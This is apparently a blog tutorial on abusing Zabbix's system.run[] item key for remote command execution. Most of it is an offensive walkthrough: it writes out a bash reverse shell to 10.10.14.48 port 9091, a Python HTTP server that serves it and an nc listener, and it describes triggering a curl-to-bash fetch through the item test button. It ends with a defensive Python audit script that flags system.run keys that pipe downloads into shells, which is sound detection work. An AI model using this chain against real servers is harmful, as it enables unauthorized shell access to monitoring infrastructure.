Hi Brother,
I am sorry that I am only now updating this blog with another tutorial. Today, I am going to write a tutorial on exploiting Zabbix functionality to achieve remote command execution. We can weaponize this functionality to get a reverse shell.
What is Zabbix
For those who don't know what Zabbix is, you can visit https://www.zabbix.com/. Basically, Zabbix is a monitoring platform that you can integrate with many other technologies.
Zabbix’s Item
An item is an object that is responsible for collecting data from the end host. When you are in the Zabbix panel, you can go to the Host and select the host whose details you want to see.

Exploiting Item
As we know, an item is responsible for collecting information from the endpoint. Items offer many useful features for gathering information. You can find them in the key details, which you can explore from this menu.


One of the interesting keys is system.run[], which allows us to run commands on the Zabbix server.

We can exploit the above feature to run our payload on the Zabbix server. The command below runs curl, which connects to our attacking server and fetches index.html by default; the output of index.html is then piped to bash.

With the above in place, we can follow the steps below to get the reverse shell.
Write Payload
Create index.html and put our reverse shell payload in it. You can run this command in your terminal to write the payload into index.html:
echo '/bin/bash -c "bash -i >& /dev/tcp/10.10.14.48/9091 0>&1"' > index.html
Run HTTP Server
Because the Zabbix item will connect to our HTTP server using curl and fetch index.html to get our payload, we need to run the command below to start the Python HTTP server:
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/)
Start Shell Listener
You need to start a listener to receive the reverse shell callback with the command below
└─$ rlwrap nc -lnvp 9091
listening on [any] 9091 ...
Run the exploit in Zabbix Item
You need to create a new item in Zabbix and put the payload that I mentioned earlier in the “Key” field.

To execute the command above, you need to press the “Test” button that is placed at the bottom of the page.

The next thing to do is to push the “Get value and test” button to execute the curl command on the Zabbix server.

As you can see, when you press the “Get value and test” button, the Zabbix server connects to the HTTP server because curl is triggered. Once index.html has been read, the payload inside it is piped to bash, which chains the execution and runs the payload directly, and the reverse connection is eventually established as shown in picture 3.
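From the defender's side, the item key described above is easy to spot in an inventory of item keys. The following is an added example, not code from the original post: it flags every system.run[] key and marks those that pipe a download straight into a shell. The host names, sample keys and function names are constructed for illustration.

```python
import re

# Zabbix item key of the form system.run[<command>,<mode>]
SYSTEM_RUN = re.compile(r"^\s*system\.run\[(?P<params>.*)\]\s*$", re.S)
FETCHERS = {"curl", "wget"}                     # tools that download content
SHELLS = {"sh", "bash", "dash", "zsh", "ksh"}   # interpreters that would run it

def first_param(params):
    """Return the first key parameter (the command), honouring key quoting."""
    params = params.strip()
    if not params.startswith('"'):
        return params.split(",", 1)[0]          # unquoted: ends at the first comma
    out, i = [], 1
    while i < len(params) and params[i] != '"':
        if params[i] == "\\" and params[i + 1:i + 2] == '"':
            i += 1                              # \" is an escaped quote
        out.append(params[i])
        i += 1
    return "".join(out)

def classify(key):
    """Return 'ok', 'remote-command' or 'fetch-pipe-shell' for one item key."""
    m = SYSTEM_RUN.match(key)
    if not m:
        return "ok"
    stages = [s.split() for s in first_param(m.group("params")).split("|")]
    # Program name of each pipeline stage, with any directory prefix removed.
    names = [s[0].rsplit("/", 1)[-1] if s else "" for s in stages]
    if any(a in FETCHERS and b in SHELLS for a, b in zip(names, names[1:])):
        return "fetch-pipe-shell"
    return "remote-command"

def audit(items):
    """items: iterable of (host, key). Return a finding for every system.run key."""
    return [(h, k, v) for h, k in items if (v := classify(k)) != "ok"]

# Constructed sample inventory (hosts and keys are invented for this example).
SAMPLE_ITEMS = [
    ("web01", "vfs.fs.size[/,used]"),
    ("web01", "system.run[uptime]"),
    ("mon01", 'system.run["curl http://192.0.2.10 | bash"]'),
    ("db01", "system.run[/usr/bin/wget -qO- http://192.0.2.10/x | /bin/sh,nowait]"),
]

if __name__ == "__main__":
    for host, key, verdict in audit(SAMPLE_ITEMS):
        print(f"{verdict:17} {host:6} {key}")
```

Zabbix agent 5.0 and later deny system.run[*] by default, so such an item only runs where the agent configuration carries an AllowKey=system.run[*] rule or the deprecated EnableRemoteCommands=1. Checking agent configurations for those settings complements this audit.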
